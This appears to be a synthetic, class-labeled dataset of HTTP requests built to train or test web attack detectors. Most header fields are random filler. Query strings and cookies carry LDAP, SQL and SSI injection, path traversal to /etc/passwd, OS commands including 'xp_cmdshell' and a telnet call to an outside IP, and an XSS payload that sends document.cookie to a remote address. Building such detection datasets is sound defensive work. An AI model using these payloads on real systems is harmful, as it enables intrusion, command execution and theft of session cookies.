If-None-Match: "GNA9-AmAhp8X3WPux9"
If-Range: *
Max-Forwards: 775
MIME-Version: 3.4
Pragma: okHr='lsnaw'
Proxy-Authorization: n0eu ard9hoW=9os6s
Authorization: yrauwn ng8rwsu=eto9ysu
Range: -7190
Referer: /tqddoft.dll
TE: chunked;q=0.6
Trailer: Authorization
User-Agent: Mozilla/2.5 (Windows; U; Win98 7.7; lh-Ss; rv:0.4.4) Gecko/25039019
UA-CPU: 68000
UA-Disp: 3162,764,8
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 8969x195
Via: FTP/3.7 www.dxeetn.gif, 4.5 68.130.56.226, FTP/6.8 www.bsth.shtml
Transfer-Encoding: deflate
Upgrade: keeao/1.8, ytF/7.1
Warning: 273 www.Sneje.htm "srzSNAitebchch" "Mon, 20 Dec 04 23:29:19 UTC"
X-Forwarded-For: 166.133.168.205
X-Serial-Number: 919920115
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39668
Start - Id: 37244
class: LdapInjection
GET /etbeiikot/a_oJ-InL13fc/SN.aspx?QsDusrUan6=80707&scriptpAnetcat3EI4u.log=67314676&gWBF4ssc4Kx=%3C&xliitmcfrs=294&3vkeaeseeqtn=894753516&P4=f3tATb&ulene3ctrnabg7r=y&5St=5oie&nnbih=%29+%28%7C+%28YStu%3Dwrr3s*%29&ouulQwhaustrmTo=823026144&l6nbeMPe6Dix=lhondnr&Zwinnt8Eaccess_logmndDwAr=au&sakh=eservicesMuarcnetcat%5C%7C%3Bbina- HTTP/1.0
Host: 200.91.194.107:90
Connection: ae5TRie
Accept: */*;q=0.7
Accept-Charset: us-ascii;q=0.0, euc-tw, iso-8859-7;q=0.2, x-mac-hebrew;q=0.9
Accept-Encoding: *
Accept-Language: *
Cache-Control: 5its8xr1=Igndhc
Client-ip: 55.184.96.107
Cookie: deey=K 
Cookie2: $Version="556"
Date: Sat, 30 Oct 04 19:27:08 UTC
ETag: W/"fGQbBlOes2k28gT0z"
Expect: cpsaCu
From: setrsl@itqn6e.net
If-Modified-Since: Sun, 29 Apr 07 13:58:09 UTC
If-Unmodified-Since: Sat, 09 Jun 07 09:58:36 CET
If-Match: *
If-None-Match: *
If-Range: Thu, 06 Jul 06 06:24:21 CET
Max-Forwards: 77
MIME-Version: 6.5
Pragma: no-cache
Proxy-Authorization: NTLM b290WWNidHVyZWFtcG85c2hwZXNsZXJhZWV0bmVvMTlvdG4wc2l5ZGM5bGE=
Authorization: Htseo kOIv=thetog
Range: 38889-,402727-278555
Referer: http://www.trsrb.be/nrrnhla/etSiE9/oa5ym/hsattbuw/iloe.zip
TE: deflate;q=0.2,trailers,chunked;q=0.3
Trailer: Authorization
User-Agent: Mozilla/8.1 (Machintosh; U; PPC Mac OS X 6.8; at-ui; rv:7.2.0) Gecko/68095087
UA-CPU: PowerPC
UA-Disp: 3304,573,16
UA-OS: Win95
UA-Color: color32
UA-Pixels: 322x932
Via: 9.4 8.82.230.223, HTTP/8.6 184.73.164.59, saehx/6.9 196.2.63.78
Transfer-Encoding: deflate
Upgrade: aybij/7.6, 6sthiq/6.8, nNx/6.1, wAen/2.4, 0taES/8.7
Warning: 519 www.ieWtti.tiff "seRierlduyai" 
X-Forwarded-For: 217.7.45.94
X-Serial-Number: 9354462419781975
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37244
Start - Id: 44299
class: OsCommanding
GET ..�../..�../mssql7/install/pubtext.bat" & dir c: .exe? HTTP/1.0
Host: www.eeoo4h.net
Connection: tihne
Accept: */*;q=0.1
Accept-Charset: windows-1250, windows-1253, iso-2022-jp;q=0.6
Accept-Encoding: compress;q=0.8, gzip
Accept-Language: Wo-s
Cache-Control: max-age=517
Client-ip: 86.249.82.37
Cookie: uiao=v:t;b9adtisiucnhSda=NtllargineEaha;ifbt=vr665oenrtneoYmt;eameb0ende=autoexecall;qvaPij=s o5a
Cookie2: $Version="583"
Date: Fri, 30 Jan 04 22:27:24 UTC
ETag: "z-wEaS4pP5@ex2B"
Expect: 100-continue
From: l1Bt7@hnsv2sT9.net
If-Modified-Since: Mon, 26 Jul 04 09:17:10 CET
If-Unmodified-Since: Sat, 11 Sep 04 17:03:51 CET
If-Match: "b-3et0hK1ij@XhQlRZb"
If-None-Match: *
If-Range: Thu, 08 Jun 06 05:24:57 UTC
Max-Forwards: 95
MIME-Version: 6.6
Pragma: no-cache
Proxy-Authorization: Digest cnonce="herhr"
Authorization: Basic QXZuUmhjcnU6YWc2bmExaA==
Range: 3-
Referer: /3snx/4pLsafn/ite3.pl
TE: deflate,chunked,trailers
Trailer: Expect
User-Agent: tenlefnt
UA-CPU: PowerPC
UA-Disp: 9070,4804,16
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 521x0746
Via: 1.3 www.wttans.png:729
Transfer-Encoding: compress
Upgrade: ott9i/7.1, tei/4.6
Warning: 525 251.120.159.217 "ay2yetttoyyhQsouLs" 
X-Forwarded-For: 81.125.200.90
X-Serial-Number: 7359375071
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44299
Start - Id: 40655
class: SSI
GET /sowHoteoGheHnjl.pl?wy0rAO2lns=hltd%28&idshihhtrss=182&yy8fidna3Walsan=7845&6Bmnhd=eze&7ed=%5B%26shutdownPnatb1enr&ICpPFMimgom_wC=tJv7gySk-Ue&JzwinntWbwinnt=1s&thmu=78959999&on8nj30adla=opt&hnooclApcrT=3&ewyyctsOXdwpna2=ahd+heose&dkcs=+atsbrsycimgeaid&bthzaOnpet=%3C%21--+%23include+++++virtual%3D%22c%3A%5Cwinnt%5Csystem.ini%22++--%3E&sp9es5=l HTTP/1.0
Host: 166.241.232.123
Connection: Ters6
Accept: text/*;q=0.5
Accept-Charset: *;q=0.3
Accept-Encoding: *;q=0.4
Accept-Language: emsio9-serte0i;q=0.5, njdo9sj-3eba, s4s-12rrle5;q=0.0
Cache-Control: no-transform
Date: Tue, 13 Apr 10 02:50:17 GMT
ETag: W/"2Gp0H84eXNLw2@KT"
If-Unmodified-Since: Mon, 27 Feb 06 09:55:26 CET
If-None-Match: "mbUBdyiFLE8akywo.bs"
Referer: /xsfyaiw0/re6pbd/i9rhqo/n3Oau.jsp
TE: deflate;q=0.7,trailers,trailers
User-Agent: sEydesirdx
Via: 1.1 126.180.156.12, 9.6 www.vvlshA.jpeg
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40655
Start - Id: 44660
class: PathTransversal
GET /ierrr/r6@K_vwI3u0.Aa7YHko/iUL4QC-/szdhRxrOExWA.cgi?tzn=7&eb71=ce%27tniopeneihavingxml1&QallnY=adTst7ut9&1alptaknhat=aleopen&efcht8doghhepaA=ncnEQ_%40&iprTE4nteiern=10209488&trgorS2enses0a=8a9Azg5scd&mlne=56304229&ye=er9SlAblof&ieSz=4674386092&elahnaa41neznde=1feAddhnt5i&aUs=9493197&lecam1gsSO3=769165666&mvKzQhqx4n=lyeuTe2hxspic&aseree=sLxP-%40Vw.Pw6 HTTP/1.1
Host: www.Nnnntoy.uk
Connection: cegtntst
Accept: */*
Accept-Charset: shift_jis, iso-8859-4;q=0.3
Accept-Encoding: *
Accept-Language: *
Cache-Control: max-stale
Client-ip: 16.130.45.174
Cookie: EmlgmuitsMu=e65zetpaset;n9vlid=/./../../.././../.././../.././../../../
Cookie2: $Version="65"
Date: Sat, 19 May 07 24:41:18 GMT
ETag: W/"VAslha7k8xHV9wx9lJjJ"
Expect: meuhstee
From: fIfg@eoiOetgSo.fr
If-Modified-Since: Fri, 11 Feb 05 07:39:00 CET
If-Unmodified-Since: Thu, 31 Dec 09 19:13:23 UTC
If-Match: *
If-None-Match: *
If-Range: Thu, 27 Jan 05 16:47:13 UTC
Max-Forwards: 7
Pragma: no-cache
Proxy-Authorization: eaowfh leeewnas=9Iy2e
Authorization: Digest realm
Range: 73929-1,-1308,686-
Referer: http://www.5thrr.cz/ferem6/2esypV.mpeg
TE: chunked;q=0.2
Trailer: Connection
User-Agent: Mozilla/9.5 (X11; U; Open BSD i586 6.2; ls-P2; rv:9.3.5) Gecko/77932564
UA-CPU: MIPS
UA-Disp: 508,1015,8
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 687x183
Via: 6.0 www.nC8a.gif, 9.8 19.147.75.108, HTTP/2.0 215.212.80.183
Transfer-Encoding: deflate
Upgrade: 3Iagi/8.7, cszi/4.8, hgsxq3/6.4, 6uts8a/4.0, von4ea/4.1
Warning: 131 252.145.208.111 "ieondrt" "Sun, 10 Aug 08 22:40:38 GMT"
X-Serial-Number: 0781889348466
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44660
Start - Id: 42542
class: SqlInjection
GET /uiqososamcbOhsh45T/ca/tn/7GW0cWUW/nn/o1rQzyB8wh5U/ztTv8tThteLaan/eI-6b_UkFC8EU/yTT9TPEX_pZwp/eaFazf7EpeAiOa4rsbs/andIMopen.7nodecmd.pl?riwa=o%7C+fg1u&nPphpHS=%2B4ni&aadrtirhoaeegA=16127602&dtX4txttaqd7ie=n+r1tatse8lstdins&ceht=a5en5qenimEneueawe&Itrpep1ods2nc=na&OoWLnN1_4lL=stdinedgtmpu%3Ebinopentn%24iANp%2F&re1sqlhcddo=%27++++%2F**%2F++++OR+%2F**%2F%27%27++%3D%27 HTTP/1.1
Host: www.eaafa.net
Connection: close
Accept: */*;q=0.6
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-age=6227
Client-ip: 144.73.242.147
Cookie: bwQssyerhhh=2866
Cookie2: $Version="1"
Date: Thu, 31 Dec 09 20:55:13 CET
ETag: "R_27@H9wdTqDRe2"
Expect: oc967Rm
From: bs1as@pton6i0pc.org
If-Modified-Since: Sun, 13 Sep 09 09:57:18 UTC
If-Unmodified-Since: Wed, 05 Jan 05 20:27:53 CET
If-Match: "OdKa-wpU2-1m6YB"
If-None-Match: *
If-Range: Wed, 20 May 09 24:21:17 UTC
Max-Forwards: 9
MIME-Version: 3.7
Pragma: vncfeta=jgrxinin
Proxy-Authorization: NTLM ZW9hbnRtYnlsRXN0c3BBYXR5ZzhTczhhM29Fb3NvcGQ=
Authorization: NTLM YWNjZ0FuRUd0aGVpb3djeWRlb3lnc3RBbGFlZHluczh1b3RidGx0bzNOSUU=
Range: 79786-446
Referer: /n8yes/ospA/6taruhtd/virae/ees5n.jsp
TE: trailers,trailers,gzip
Trailer: Via
User-Agent: nwaiosttqapwhaIoe
UA-CPU: x86
UA-Disp: 1092,0849,8
UA-OS: Win95
UA-Color: color16
UA-Pixels: 8264x986
Via: FTP/9.2 www.66sC74.shtml:88030, FTP/4.3 195.223.180.243
Transfer-Encoding: identity
Upgrade: e2torm/4.8, rnb/5.6, cpieM/3.1, alfi/8.5
Warning: 563 www.aePi5.gif "edicbUoeitewfnmtlui" 
X-Forwarded-For: 10.31.99.179
X-Serial-Number: 1876106760
----: -----------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 42542
Start - Id: 41141
class: SqlInjection
GET /jyHb.jpeg?eltanpec=41568&tynl=exec++++xp_cmdshell+++%27%22mohewPcb8%22+++++%3E%3E+++++script.vbs%27&e2sheueo=oounioni&yezt=naeETneaulnn1fNse&Nece=5688124&fmefnanrwsnnrLw=3433462 HTTP/1.0
Host: www.viii.fr
Connection: close
Accept: image/jpeg;q=0.6
Accept-Charset: iso-2022-jp;q=0.6, windows-1252, cp-950, hz-gb-2312;q=0.4
Accept-Encoding: *
Accept-Language: *;q=0.9
Cache-Control: no-transform
Client-ip: 186.39.67.114
Cookie: gNhCqt2divshutdownVDO=ne5eaia5is6ricyr;tfssdniewbeg=ees(g eval/r;zyF1sm1J7=reelA\n;tu=Mre;lhRmm=sS84pn;b5b0TUat=gnxAOJrt8
Cookie2: $Version="645"
Date: Fri, 29 Apr 05 10:30:43 GMT
ETag: "3gWmZjep6Aga7L5S"
Expect: 100-continue
From: r3rduu0D@aEtfemeowc.cz
If-Modified-Since: Sat, 16 May 09 09:48:14 UTC
If-Unmodified-Since: Wed, 06 Dec 06 24:51:30 UTC
If-Match: "@OvZOKpmLqwcNPhkkJu"
If-None-Match: *
If-Range: *
Max-Forwards: 3
MIME-Version: 7.8
Pragma: drcar='5lizntie'
Proxy-Authorization: Basic dDlsN2UzOnJnZWUyZQ==
Authorization: NTLM ZDk3M3Rlcmg3a21wdXRuaWVobWlkb29VbG9nZWF5bUU=
Range: 8796-38,34-469,9-0
Referer: /e84nfEot/occhaLeo.swf
TE: gzip;q=0.4
Trailer: If-None-Match
User-Agent: Mozilla/8.7 (Windows; U; Win 9x 3.0; eh-ag; rv:6.6.0) Gecko/21260232
UA-CPU: Sparc
UA-Disp: 952,1268,32
UA-OS: FreeBSD
UA-Color: color16
Via: FTP/6.9 www.xsllmf.png, 8.2 www.blim0.shtml, uif2/7.4 206.39.158.58
Transfer-Encoding: identity
Upgrade: ng6s/4.8, 4et/8.2
Warning: 458 www.anke2uT.gif "btsiteht9hIieeLwah" 
X-Forwarded-For: 169.105.19.193
X-Serial-Number: 200032143188636
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41141
Start - Id: 36744
class: OsCommanding
GET /otms5c4/7hYinputFATmu1Xu/s2Zy4/1DKLVvbscript/1fLoPF1aCOc/TeyooiqareuWf/g2jUlA/ia7C17nL/lcotpRdm2pregsio.asmx?O4ug=nunin&arturers=inris&ke=%22+%3B++telnet++++24.225.23.138+80++++%3B HTTP/1.1
Host: www.tinloon.ch
Connection: aeVnAli
Accept: */*;q=0.6
Accept-Charset: *
Accept-Encoding: 
Accept-Language: iaolni-aziz, iblOe-io, uny-ethls;q=0.3, 1dtafd-sueiae;q=0.6
Cache-Control: no-cache
Client-ip: 66.186.73.243
Cookie: anoz=<n@ah;oectrr=nr3;tuwmsdss=hOnlOmsrxrt3r;wjEFTW3Hl=yzdne7toxehaio
Cookie2: $Version="546"
Date: Fri, 05 Feb 10 11:53:42 UTC
ETag: "Pj4xEi@aI3WQBD3"
Expect: iuowlu=arrod;at3irEyt=cnoiy
From: 9rrtotci@rtshul.org
If-Modified-Since: Sun, 21 Mar 10 09:40:02 GMT
If-Unmodified-Since: Mon, 12 Oct 09 17:28:32 UTC
If-Match: "9u1gCXJeugj11uS0qW"
If-None-Match: "jCQ.nuPqlOxdDxD"
If-Range: Sat, 03 Apr 10 16:44:27 GMT
Max-Forwards: 3
MIME-Version: 1.3
Pragma: no-cache
Proxy-Authorization: Digest algorithm=Rrf1lpt
Authorization: NTLM Z2FrZ0lzbTd0Y29Jd0VzbTBxdXMxZWNmbHNFaG9lZWx0ZXNwbWlhbjZvYWU=
Range: 50-7
Referer: /r7nl0juu/t9iyeqZ.php4
TE: gzip;q=0.2
Trailer: From
User-Agent: Mozilla/4.6 (compatible; y3pouhe; Win98; rqt8)
UA-CPU: Sparc
UA-Disp: 944,674,16
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 1003x5848
Via: 9.3 www.etflo.css, 5.9 www.neotci7o.shtml
Transfer-Encoding: deflate
Upgrade: evenU/1.9, Quheec/0.8, sieT/8.6, e9Rslt/7.3, iZner/9.0
Warning: 827 200.163.181.184 "tisa" 
X-Forwarded-For: 4.110.8.55
X-Serial-Number: 51873709956197
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36744
Start - Id: 41322
class: SqlInjection
GET /emv28Dfa3frtt/oW_UJj6RLHDk/twVS59/fnyfromRSWMv6mK.dll?rlryrw4eie7=c%5D&eish=m%7En%26 HTTP/1.0
Host: www.tnoyotn1.it:7822
Connection: 8xaw
Accept: */*
Accept-Charset: iso-8859-3, iso-8859-6;q=0.1
Accept-Encoding: *;q=0.5
Accept-Language: w-1r, som-usaeaon;q=0.3, oa0-wsrzOsnR
Cache-Control: no-store
Cookie: sh=we9Omkqneyc;fswu2TomoE4y='select    customer_phone    '||'from     customers  '||'where     customer_surname='''||    lv_surname||'''   and     customer_type=1';
Cookie2: $Version="16"
Date: Tue, 03 Oct 06 13:44:27 GMT
ETag: W/".VDOo3BI5ZB92xrT2dx2"
Expect: 100-continue
If-Modified-Since: Thu, 06 Mar 08 07:32:25 CET
If-Unmodified-Since: Tue, 05 Jun 07 11:51:00 GMT
If-Match: *
If-None-Match: ".BnMpvOIPjnjTdU"
If-Range: "5VO@FyvTtY0.PFp2siuY"
Max-Forwards: 4
MIME-Version: 0.2
Pragma: no-cache
Proxy-Authorization: NTLM YWttaXlyaXJjbk1naVZiM29lc2l5b2wwbmV0dGhlZWU=
Authorization: Basic bjJ0YWFoZ2Q6cm9yUGJrYmc=
Range: 049933-
Referer: /aejsmrd/phdb/i0lsdler/iorc7e/k9iidgoa.jsp
TE: deflate;q=0.4,trailers,trailers
Trailer: Proxy-Authorization
User-Agent: cIqfN5dJqs http://www.iEepsef.st
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 654x944
Via: 8.4 236.28.118.65, 4.7 www.Tle6ij.htm:6, 8.8 9.208.144.87
Transfer-Encoding: crnn; 1eroa=hamy0ikc
Upgrade: z7mnyi/7.1, meohI/0.8, eOtfa/4.5, rnyaca/2.1, mina/5.4
Warning: 906 www.C8ogb.jpg "cflnxg4Nltoxcssnedi" 
X-Forwarded-For: 94.64.57.114
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41322
Start - Id: 47917
class: XSS
GET /5gqbRCkdGh760063pY/goidrop16jlo/CVq6nSboot.ini/dsia19nbuKI/naytnmeeoorsn2quy/KzyT/pNF.mdb?hmgisaainhawe=SexrscSbex5eih&tpmedsn=7e0a8heeYsensihuO&qoag=s+dB%5B&le8Etsqmwhg=%3Cstyle++++%3E%3C%21--%3C%2Fstyle++++%3E%3Cscript%3E%5Bwindow.open%28%27http%3A%2F%2F221.127.1.224%2Feldend.php3%27%2Bdocument.cookie%29%3B%5D%2F%2F--%3E%3C%2Fscript++%3E&V5ptO03=rHbJUOW.8gR&jlsueh4Kmue=uavbscripteeC7&DpsHdrpewindow.openl0vO=63&meUsrap6=fBt&no=7AV&iatArueTtrhotl=gTtere&QtKeNi2U=aTbW6XiGnyq&ncntcpeixaN=60&elbhhfnsthOe=tGhf_VgmBa&aniw4f3e2=mE3DqDl HTTP/1.1
Host: www.edNTSlob.ch:80
Connection: atmdd2aD
Accept: video/quicktime;q=0.6, image/*;q=0.1
Accept-Charset: iso-2022-kr;q=0.0
Accept-Encoding: *
Accept-Language: p-dxt2ttai;q=0.3, iut-sITottf;q=0.7, es9nTim-afehoX, ibio-a, its-1E9ci9i
Cache-Control: min-fresh=3758
Client-ip: 66.227.154.212
Cookie: 7FUacceptxQwWmzo=wd6f25Ij0p;i5wemclsid1aosI=<aeaapshttpaeyIwnthe;7Y46wZk=i0n
Cookie2: $Version="20"
Date: Sun, 02 Apr 06 18:20:56 CET
ETag: W/"FxFIMkqEChMJ8o8cBQ"
Expect: miJlaez
From: es4Wewg@gthaea.de
If-Modified-Since: Tue, 01 Sep 09 11:55:50 UTC
If-Unmodified-Since: Sat, 16 Dec 06 17:55:34 UTC
If-Match: "T2qHObVWQXwPwDGQykRn"
If-None-Match: *
If-Range: Sat, 21 Apr 07 12:52:03 GMT
Max-Forwards: 272
MIME-Version: 8.8
Pragma: no-cache
Proxy-Authorization: Basic emllZWVlOnpnYWU=
Authorization: teeo iilng=ibotOre
Range: -419,3-
Referer: http://www.vomuse.biz/5sa0ycv/erpk3eta.js
TE: trailers,trailers
Trailer: If-Range
User-Agent: ieel (s@_j.e; sV1HXbASv; e5fP_s; aIgyiPi; azJLqUyhHO)
UA-CPU: Sparc
UA-Disp: 216,2039,8
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 229x467
Via: 2.7 223.182.232.86, 4.8 www.2u4r0t.jpg, HTTP/7.7 61.176.186.103
Transfer-Encoding: gzip
Upgrade: anee5/8.2, scSotq/7.5, 3th/0.1, krezts/1.0
Warning: 342 www.a3Idnne.js "aeea" "Tue, 23 Feb 10 05:56:33 UTC"
X-Forwarded-For: 90.98.250.32
X-Serial-Number: 03181480810
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47917
Start - Id: 46404
class: PathTransversal
GET /hHt@64S4z.qHu-/uUsOaAA4/adY@Fcep3kXAH6O/eus/2RU/v8nD/mTd/erwRgv6fJ.sh?etlj7i8b=1744277456&preji=%5C.%5C.%5C%2F%5C.%5C.%5C%2Fetc%5C%2Fpasswd&nlb=56391&elwtOitodT=amLerapanciYge5brd&oweHtahglcn=abmeuere&ib=uT1OKHuVa5&iDStqevdnirr=2&ln63wp-ZO6=oUYr&x5enpflbor=iCcVYf&ni=l%24nstsJxe-n&telnetOTs6RTPx=httpftp+mhd HTTP/1.0
Host: 54.23.18.137:80
Connection: close
Accept: */*
Accept-Charset: x-mac-cyrillic;q=0.0, x-mac-japanese, x-mac-icelandic;q=0.1
Accept-Encoding: identity, compress;q=0.2, gzip;q=0.9
Accept-Language: ttre6x-oc;q=0.6, aryj-yU, Lt1tdsmu-92eseh5, uhoxslt8-rnZopia;q=0.1
Cache-Control: no-cache
Client-ip: 215.80.151.61
Cookie: 1rApqhEionice=jainclude;coaso=50;guhddos=E >ee;doccetcr=YV(hh;Hie=5mN0nsdemifurnAa
Cookie2: $Version="93"
Date: Sat, 24 Dec 05 04:40:40 GMT
ETag: W/"AuAN-mgN8NIK-@ZSw.r"
Expect: 100-continue
From: eitn@airwo.uk
If-Modified-Since: Mon, 05 Jan 04 21:07:37 UTC
If-Unmodified-Since: Mon, 19 Feb 07 13:50:28 GMT
If-Match: "yQa-3QOZ2XEAj@zOY6kt"
If-None-Match: *
If-Range: *
Max-Forwards: 7872
MIME-Version: 3.5
Pragma: etel=IawchrR
Proxy-Authorization: NTLM bXQ0aTZtczlyc2llb3dEc25rcTFoZHNoaUVnUHRvYW5kRWV0
Authorization: NTLM ZWNyc2hIMWpkY250bnRmaGVlaFNiZTJmb2llZGRuMWU0
Range: 0-,-1441,-234089
Referer: /molpm/heaiezEr.pdf
TE: gzip;q=0.2
Trailer: TE
User-Agent: Mozilla/0.9 (Windows; U; Win98 2.9; te-md; rv:6.1.7) Gecko/44325015
UA-CPU: MIPS
UA-Disp: 9745,801,16
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 999x039
Via: 7.0 251.86.133.152, 8.0 www.hAee.tiff:908
Transfer-Encoding: identity
Upgrade: 1qohtl/5.6, dsgali/4.9
Warning: 070 www.eidmeFjN.shtml "nisl" 
X-Forwarded-For: 141.149.156.77
X-Serial-Number: 22445
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46404
Start - Id: 40823
class: SSI
GET /nhrIRfnMIfX335fx/fjes/q5YKUvf_/b9lldsele/eriEVci/foT8wRlS./fUliIOShotqmNG.htm?7c8EW@WkLWf=sa2h6a&naCrpLrtn=01&m2ree1ouos9tTe=rrts&ttoFoutdertne=%3C%21--++++%23odbc+++connect%3D%22autLtnn%2Ceo%2CZFts%22+++++statement%3D%22select++++*+from+++ni%22--%3E&e1exnt=aqxUIM6&on=30475150&lXajSgk8@bt=l4kT HTTP/1.0
Host: www.tc7te.ch:1
Connection: close
Accept: */*;q=0.4
Accept-Charset: *;q=0.3
Accept-Encoding: compress, gzip, compress, identity
Accept-Language: eyduud-cloybg;q=0.1, aq-yei;q=0.0, ste-ksewrtn;q=0.7, brh-ds3srtym;q=0.0, nuass-ag;q=0.4
Cache-Control: max-stale
Client-ip: 161.64.252.8
Cookie: hnoderZEinputBi=abR
Cookie2: $Version="76"
Date: Mon, 06 Nov 06 09:07:07 GMT
ETag: W/"qdz019m0zJXAq1Na"
Expect: 100-continue
From: kpa1hln@eotgi.biz
If-Modified-Since: Tue, 10 Feb 04 18:25:50 CET
If-Unmodified-Since: Thu, 14 Dec 06 16:15:58 CET
If-Match: "TrZaYg5._f@ouFd1lMcE"
If-None-Match: "P2-Y0J4hajwZASxVXA."
If-Range: Sat, 10 Mar 07 12:00:02 GMT
Max-Forwards: 8649
MIME-Version: 5.2
Pragma: t=iIand
Proxy-Authorization: es08e taeiRD8d=u4req1e
Authorization: hbi8 deEnscr=trIi7a
Range: 90-,846222-
Referer: http://www.Eeh6ca.org/iehrT.gz
TE: trailers,trailers,chunked
Trailer: Transfer-Encoding
User-Agent: Fhcnna2me0it
UA-CPU: x86
UA-Disp: 327,318,8
UA-OS: Win98
UA-Color: color16
UA-Pixels: 276x204
Via: 7.5 255.143.60.94:807
Transfer-Encoding: identity
Upgrade: oe6/8.4, dnONf/7.2, Deodc/9.7
Warning: 601 42.121.7.112:3 "rlcreLunhecrNsee" 
X-Serial-Number: 623411
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40823
Start - Id: 45965
class: PathTransversal
GET /2RaRENY0/rn/8t9bXupxUCj6h-CKD/ezVDHqDnT3EUOpuN_f.cgi?Tcw=rmr&RcsrtEfcts2ts=pstlaeeoaeooto1&IPco8mk=i%5C0%3DH%24exm2%7Cpnny%7Cho%5Clog&l6=..%2F..%2F..%2F..%2F..%2F..%2FWINDOWS%2Fautoexec.bat&Ui.LzmailJ@YD=0917099&0GssXEdl=Vaj9aEO%24hGnull&a8tB=gh1%3D3n&Awp-udbgsoundNNIZg=84476&Osg=144881 HTTP/1.0
Host: 252.42.102.196:117
Connection: close
Accept: image/png;q=0.7, application/rtf;q=0.3, application/zip;q=0.2
Accept-Charset: shift_jis
Accept-Encoding: *
Accept-Language: s-hlt;q=0.9, Ntcnw-8snpetoa;q=0.4, fr-n;q=0.8, X-Nu9ne0
Cache-Control: max-stale=5
Client-ip: 84.6.25.215
Cookie: m@aPAr=ki1nnOyst;gvxVY.drop=70;lhiteae6xsnj=13
Cookie2: $Version="13"
Date: Sun, 06 Sep 09 10:13:37 CET
ETag: W/"Tw.50e1c0c9D2NOl@2Y"
From: giwa@ncetc3ams.net
If-Modified-Since: Tue, 08 Sep 09 20:30:02 CET
If-Unmodified-Since: Sat, 03 Apr 10 09:22:26 UTC
If-Match: "wrzQ1MO@qhdCVQ5H8gd"
If-None-Match: "Rl8DL2b6u4C3pnSOj"
If-Range: *
Max-Forwards: 699
Pragma: no-cache
Authorization: egeteo TokaeEce=c8yd
Referer: http://dhtr.net/2bs6et/rpot/oejm/tgrw.css
User-Agent: Mozilla/3.9 (compatible; thbhwzniy; Win98; MleefyBa; umfr)
UA-OS: Win98
UA-Color: color16
UA-Pixels: 297x264
Via: HTTP/2.9 190.196.108.169, 1.4 189.254.47.60, HTTP/9.5 43.240.173.254
Transfer-Encoding: identity
Upgrade: gOraok/6.8, woRu/7.2, saOiE/3.6, nltr/3.7
----: ------------------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 45965
Start - Id: 37020
class: LdapInjection
GET /totaeyvri5iDn8aa/tWTeNw-H0-oIgss@B/5bobt0QdanNrretdi12e/abm9fG/d3Op/tgiqrlaneda40tri.asp?oeoiamenf9ihceu=867%29%28%26%28objectClass%3Dirsr%29%28%7C%28sn++%3D+ttg%29%28cn%3Dpee+++++J*%29%29 HTTP/1.1
Host: 178.26.9.198
Connection: close
Accept: text/*;q=0.5, text/*
Accept-Charset: *
Accept-Encoding: gzip;q=0.2, deflate, gzip, identity, deflate
Accept-Language: stnpt-erqShl, r9xAe-aiNdfrp;q=0.9
Cache-Control: only-if-cached
Client-ip: 191.221.35.119
Cookie: h2Pi@bzgroup by-Mr=rufeoHs;weaba=t5Ltv;b2Dfehtas2sl=o7ume;tnsd7Sht=28520290;rstQ3=t;ipoOn=nseoetfomme
Cookie2: $Version="6"
Date: Tue, 07 Nov 06 24:54:54 CET
ETag: W/"M2xwjae@G8gpcI6el9.Y"
Expect: 100-continue
From: B3nrc@Ecode1.gov
If-Modified-Since: Tue, 24 Aug 04 11:09:51 CET
If-Unmodified-Since: Wed, 15 Apr 09 04:35:42 GMT
If-Match: *
If-None-Match: *
If-Range: Mon, 15 Sep 08 16:13:33 CET
Max-Forwards: 7819
MIME-Version: 2.2
Pragma: no-cache
Proxy-Authorization: NTLM bjhjeWN6aXRhb2VyY2VzcnBvOXloU2Y1dnJsdGhsNnRyOG5pb2N4TE4=
Authorization: roml abl8p=2srnf
Range: 00177-,0-7679,-82265
Referer: /bnhoEd.php3
TE: chunked;q=0.0,chunked;q=0.6,gzip;q=0.7
Trailer: Accept-Charset
User-Agent: cC6h4Xe http://www.owt1.st
UA-CPU: MIPS
UA-Disp: 2495,217,8
UA-OS: Win98
UA-Color: color16
UA-Pixels: 2678x798
Via: 7.7 www.dncf.html, 4.5 www.iy3rs.tiff:20, 3.9 155.57.126.158:412
Transfer-Encoding: tvtacS
Upgrade: ieoez/4.0, enkhu/2.3
Warning: 561 255.42.223.99:0 "naeetom" "Sat, 31 Jul 04 14:02:35 GMT"
X-Forwarded-For: 164.143.217.25
X-Serial-Number: 4092233930
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37020
Start - Id: 46636
class: XSS
GET /ItuuS0roaEdeeSy7p.png? HTTP/1.0
Host: www.aBsoepbav.be
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: gzip;q=0.8
Accept-Language: *;q=0.4
Cache-Control: no-store
Client-ip: 143.70.138.108
